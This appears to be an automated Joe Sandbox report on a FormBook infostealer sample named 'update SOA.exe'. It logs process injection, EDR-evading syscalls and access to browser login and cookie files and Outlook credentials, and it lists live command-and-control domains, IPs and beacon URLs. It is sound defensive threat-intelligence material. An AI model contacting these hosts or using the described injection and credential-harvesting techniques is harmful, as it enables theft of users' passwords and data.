            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeNtClose: Direct from: 0x76EF2B6C
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\update SOA.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\notepad.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeSection loaded: NULL target: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeSection loaded: NULL target: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\notepad.exeThread register set: target process: 4568Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\notepad.exeThread APC queued: target process: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\update SOA.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2F55008Jump to behavior
            Source: C:\Users\user\Desktop\update SOA.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\update SOA.exe"Jump to behavior
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeProcess created: C:\Windows\SysWOW64\notepad.exe "C:\Windows\SysWOW64\notepad.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: HAdkDWMZRiGMZe.exe, 00000004.00000002.3883262127.0000000001471000.00000002.00000001.00040000.00000000.sdmp, HAdkDWMZRiGMZe.exe, 00000004.00000000.2266594556.0000000001471000.00000002.00000001.00040000.00000000.sdmp, HAdkDWMZRiGMZe.exe, 00000006.00000002.3883352596.00000000016D1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: HAdkDWMZRiGMZe.exe, 00000004.00000002.3883262127.0000000001471000.00000002.00000001.00040000.00000000.sdmp, HAdkDWMZRiGMZe.exe, 00000004.00000000.2266594556.0000000001471000.00000002.00000001.00040000.00000000.sdmp, HAdkDWMZRiGMZe.exe, 00000006.00000002.3883352596.00000000016D1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: HAdkDWMZRiGMZe.exe, 00000004.00000002.3883262127.0000000001471000.00000002.00000001.00040000.00000000.sdmp, HAdkDWMZRiGMZe.exe, 00000004.00000000.2266594556.0000000001471000.00000002.00000001.00040000.00000000.sdmp, HAdkDWMZRiGMZe.exe, 00000006.00000002.3883352596.00000000016D1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: update SOA.exeBinary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
            Source: HAdkDWMZRiGMZe.exe, 00000004.00000002.3883262127.0000000001471000.00000002.00000001.00040000.00000000.sdmp, HAdkDWMZRiGMZe.exe, 00000004.00000000.2266594556.0000000001471000.00000002.00000001.00040000.00000000.sdmp, HAdkDWMZRiGMZe.exe, 00000006.00000002.3883352596.00000000016D1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.3882344624.0000000002B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3883839683.0000000005350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2343330383.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3886044229.00000000054F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2343906085.0000000006650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3883738653.0000000004A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2343594491.0000000003790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3883798608.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\notepad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\notepad.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.3882344624.0000000002B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3883839683.0000000005350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2343330383.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3886044229.00000000054F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2343906085.0000000006650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3883738653.0000000004A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2343594491.0000000003790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3883798608.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading            		412
            Process Injection            		2
            Virtualization/Sandbox Evasion            		1
            OS Credential Dumping            		121
            Security Software Discovery            		Remote Services1
            Email Collection            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Abuse Elevation Control Mechanism            		412
            Process Injection            		LSASS Memory2
            Virtualization/Sandbox Evasion            		Remote Desktop Protocol1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Deobfuscate/Decode Files or Information            		Security Account Manager2
            Process Discovery            		SMB/Windows Admin Shares1
            Data from Local System            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Abuse Elevation Control Mechanism            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
            Obfuscated Files or Information            		LSA Secrets2
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading            		Cached Domain Credentials12
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1522849 Sample: update SOA.exe Startdate: 30/09/2024 Architecture: WINDOWS Score: 100 28 www.weatherbook.live 2->28 30 www.technectar.top 2->30 32 17 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Multi AV Scanner detection for submitted file 2->46 48 5 other signatures 2->48 10 update SOA.exe 1 2->10         started        signatures3 process4 signatures5 60 Writes to foreign memory regions 10->60 62 Maps a DLL or memory area into another process 10->62 13 svchost.exe 10->13         started        process6 signatures7 64 Maps a DLL or memory area into another process 13->64 16 HAdkDWMZRiGMZe.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 notepad.exe 13 16->19         started        process10 signatures11 50 Tries to steal Mail credentials (via file / registry access) 19->50 52 Tries to harvest and steal browser information (history, passwords, etc) 19->52 54 Modifies the context of a thread in another process (thread injection) 19->54 56 3 other signatures 19->56 22 HAdkDWMZRiGMZe.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 dxzz.top 137.175.33.56, 49711, 80 PEGTECHINCUS United States 22->34 36 www.technectar.top 199.192.21.169, 49737, 49738, 49739 NAMECHEAP-NETUS United States 22->36 38 3 other IPs or domains 22->38 58 Found direct / indirect Syscall (likely to bypass EDR) 22->58 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            update SOA.exe42%ReversingLabsWin32.Trojan.Autoitinject
            update SOA.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            bqberw.vip
            		3.33.130.190
            		truetrue
              		unknown
              www.cc101.pro
              		188.114.96.3
              		truetrue
                		unknown
                queima.shop
                		84.32.84.32
                		truetrue
                  		unknown
                  crowsecurity.cloud
                  		3.33.130.190
                  		truetrue
                    		unknown
                    dxzz.top
                    		137.175.33.56
                    		truetrue
                      		unknown
                      weatherbook.live
                      		3.33.130.190
                      		truetrue
                        		unknown
                        linkwave.cloud
                        		3.33.130.190
                        		truetrue
                          		unknown
                          www.technectar.top
                          		199.192.21.169
                          		truetrue
                            		unknown
                            www.dverkom.store
                            		31.31.196.17
                            		truetrue
                              		unknown
                              www.bayarcepat19.click
                              		188.114.96.3
                              		truetrue
                                		unknown
                                multileveltravel.world
                                		3.33.130.190
                                		truetrue
                                  		unknown
                                  www.multileveltravel.world
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.linkwave.cloud
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.queima.shop
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.dxeg.lol
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.weatherbook.live
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.crowsecurity.cloud
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.bqberw.vip
                                              		unknown
                                              		unknowntrue
                                                		unknown

                                                Contacted URLs

                                                NameMaliciousAntivirus DetectionReputation
                                                http://www.bqberw.vip/ezjb/true
                                                  		unknown
                                                  http://www.linkwave.cloud/l8vr/true
                                                    		unknown
                                                    http://www.dverkom.store/66j2/?Gh9=g8u8&gHCXmDU=HppDh2G+RtpfmDCT0lrSNXbmIaO8PdTsBI8zXGv7BhGUw+IQzheJ3lftE5yUT4NGt8aZPQR/20xdb9u1HnRpXJ4mqLkzjkiMvvw05xDKhjbhyfyxEkkTngu+5afP1ml7ew==true
                                                      		unknown
                                                      http://www.weatherbook.live/0fox/true
                                                        		unknown
                                                        http://www.cc101.pro/9apq/?gHCXmDU=LHjDDAx19xzpDFr0PiWSUWbLpibiWm2OcttpvXYQA3jhT8+aBAnUV8C6f3e3WqOmZ67HZ5Oe4rCfD6agN7j3kbNhxDE+C6RgPFZIWir2F/mXh+rIzbzvAjzVwKDU5y7xZw==&Gh9=g8u8true
                                                          		unknown
                                                          http://www.bayarcepat19.click/5hcm/true
                                                            		unknown
                                                            http://www.weatherbook.live/0fox/?Gh9=g8u8&gHCXmDU=4CzKvyikl1JmGr8+CQf9WWAdO1Gj6lWNmDPUBHudsRDXm35ePvWJknN1Cj9rj3LGeee2ucHQDjkFWVqRWStwJougsDrkF+FnKnugc/NP5deCT95MsghdxHCGfuWAxmiXjA==true
                                                              		unknown
                                                              http://www.crowsecurity.cloud/8y34/true
                                                                		unknown
                                                                http://www.bqberw.vip/ezjb/?gHCXmDU=l3Sp86LdHQK51JyE1bYSLRwrZz79eLj2OPa9S2eacvhOVgE1mplOojXymOZ9YDGfggwACbk9WjYrzuHmvoZIXyGwVLnNH3EmPti700Sf3mBkVqNnJJuO7TSqISvYzPtlzQ==&Gh9=g8u8true
                                                                  		unknown
                                                                  http://www.dxeg.lol/mxqs/?gHCXmDU=rHSAWCOTv0B2OyWbYMKwkuU+0pm+dYnzeuWywUFjfL0Y5nHDImWR+DkgzCKA2Uf76rKFoLo4oU5TM+FaPt+JwQr3UHywKVmmcKRjYyDIvIOI0clKCIXncFUG+d5lZOlczw==&Gh9=g8u8true
                                                                    		unknown
                                                                    http://www.technectar.top/ghvt/true
                                                                      		unknown
                                                                      http://www.bayarcepat19.click/5hcm/?gHCXmDU=tP3kAkfnE7i1YCC3akJDPtDOQtMjgFa5K3aSOloco8KmCG1xGxL66P/sVWpGfWTMdHJkfi3yOYhNMZMhorUklSdDj9q9dz65TNSy5hy/ttZPgJetaDNmb5haRLwL+/pH9A==&Gh9=g8u8true
                                                                        		unknown
                                                                        http://www.dverkom.store/66j2/true
                                                                          		unknown
                                                                          http://www.multileveltravel.world/kdfx/true
                                                                            		unknown
                                                                            http://www.cc101.pro/9apq/true
                                                                              		unknown
                                                                              http://www.multileveltravel.world/kdfx/?gHCXmDU=eNDgnj/WfiIi0tdu+8aXiZOUK+7f3FxcWZT5SlTqKAn5yXi4RD1689oWOvV8Od+Oy+8ctbdx7DJ/alyTHONZQzsxT9MNlSdJwngJpwfGelD5vY9uXcKC+Fx9+CLw3WjCzw==&Gh9=g8u8true
                                                                                		unknown
                                                                                http://www.crowsecurity.cloud/8y34/?gHCXmDU=XU1sh1XtMideJdcsvQ849SwdzHfbiD52gXGwR5WASyJ1tlInyqc9ITTs981nRcft/RKcq7FVheMXMN6zJo5iI2BJEO7R6UftY8jdwwsPJfysQECRq1QA/MaERKdZHzC5fw==&Gh9=g8u8true
                                                                                  		unknown
                                                                                  http://www.technectar.top/ghvt/?gHCXmDU=LTjEQRzJtYpWLPC7D2gy6fienZfrxvC35gdjmmThy52R4q9H0AiUwAwLJzzKst3lsJoWNw2bCWGayp08MXQ4hrVkAG0NSKhN96qT0ct2vaZlIyhDhNk8pUo7hoK/rit8rQ==&Gh9=g8u8true
                                                                                    		unknown

                                                                                    URLs from Memory and Binaries

                                                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                                                    https://duckduckgo.com/chrome_newtabnotepad.exe, 00000005.00000002.3887050160.0000000007D2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://duckduckgo.com/ac/?q=notepad.exe, 00000005.00000002.3887050160.0000000007D2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    http://www.bayarcepat19.clickHAdkDWMZRiGMZe.exe, 00000006.00000002.3886044229.0000000005581000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=notepad.exe, 00000005.00000002.3887050160.0000000007D2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=notepad.exe, 00000005.00000002.3887050160.0000000007D2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://www.ecosia.org/newtab/notepad.exe, 00000005.00000002.3887050160.0000000007D2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      http://156.226.108.98:58888/notepad.exe, 00000005.00000002.3885110150.0000000005B6A000.00000004.10000000.00040000.00000000.sdmp, notepad.exe, 00000005.00000002.3886877799.0000000007A00000.00000004.00000800.00020000.00000000.sdmp, HAdkDWMZRiGMZe.exe, 00000006.00000002.3884241981.000000000395A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        https://www.bayarcepat19.click/5hcm/?gHCXmDU=tP3kAkfnE7i1YCC3akJDPtDOQtMjgFa5K3aSOloco8KmCG1xGxL66P/notepad.exe, 00000005.00000002.3885110150.00000000064D6000.00000004.10000000.00040000.00000000.sdmp, HAdkDWMZRiGMZe.exe, 00000006.00000002.3884241981.00000000042C6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          https://ac.ecosia.org/autocomplete?q=notepad.exe, 00000005.00000002.3887050160.0000000007D2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchnotepad.exe, 00000005.00000002.3887050160.0000000007D2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=notepad.exe, 00000005.00000002.3887050160.0000000007D2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown

                                                                                          World Map of Contacted IPs

                                                                                          • No. of IPs < 25%
                                                                                          • 25% < No. of IPs < 50%
                                                                                          • 50% < No. of IPs < 75%
                                                                                          • 75% < No. of IPs

                                                                                          Public IPs

                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                          137.175.33.56
                                                                                          		dxzz.topUnited States
                                                                                          		54600PEGTECHINCUStrue
                                                                                          199.192.21.169
                                                                                          		www.technectar.topUnited States
                                                                                          		22612NAMECHEAP-NETUStrue
                                                                                          31.31.196.17
                                                                                          		www.dverkom.storeRussian Federation
                                                                                          		197695AS-REGRUtrue
                                                                                          188.114.96.3
                                                                                          		www.cc101.proEuropean Union
                                                                                          		13335CLOUDFLARENETUStrue
                                                                                          3.33.130.190
                                                                                          		bqberw.vipUnited States
                                                                                          		8987AMAZONEXPANSIONGBtrue

                                                                                          General Information

                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                          Analysis ID:1522849
                                                                                          Start date and time:2024-09-30 18:42:56 +02:00
                                                                                          Joe Sandbox product:CloudBasic
                                                                                          Overall analysis duration:0h 8m 56s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                          Run name:Run with higher sleep bypass
                                                                                          Number of analysed new started processes analysed:8
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:2
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Sample name:update SOA.exe
                                                                                          Detection:MAL
                                                                                          Classification:mal100.troj.spyw.evad.winEXE@7/2@11/5
                                                                                          EGA Information:
                                                                                          • Successful, ratio: 75%
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 93%
                                                                                          • Number of executed functions: 25
                                                                                          • Number of non-executed functions: 320
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .exe
                                                                                          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                                                          Warnings

                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                          • Execution Graph export aborted for target HAdkDWMZRiGMZe.exe, PID 2296 because it is empty
                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                          • VT rate limit hit for: update SOA.exe

                                                                                          Simulations

                                                                                          Behavior and APIs

                                                                                          TimeTypeDescription
                                                                                          12:44:53API Interceptor6080652x Sleep call for process: notepad.exe modified

                                                                                          Joe Sandbox View / Context

                                                                                          IPs

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          137.175.33.56UMOWA_PD.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                          • www.dxeg.lol/ytua/
                                                                                          DCP11-83642024..exeGet hashmaliciousFormBookBrowse
                                                                                          • www.dxeg.lol/rkgs/
                                                                                          199.192.21.169NVOICE FOR THE MONTH OF AUG-24.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.selftip.top/85su/
                                                                                          RFQ - HTS45785-24-0907I000.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.zenscape.top/d8cw/
                                                                                          Request for Quotation Hi-Tech Park Project 193200.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.zenscape.top/d8cw/
                                                                                          DEBIT NOTE 01ST SEP 2024.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.selftip.top/85su/
                                                                                          DCP11-83642024..exeGet hashmaliciousFormBookBrowse
                                                                                          • www.urbanpulse.help/r50h/
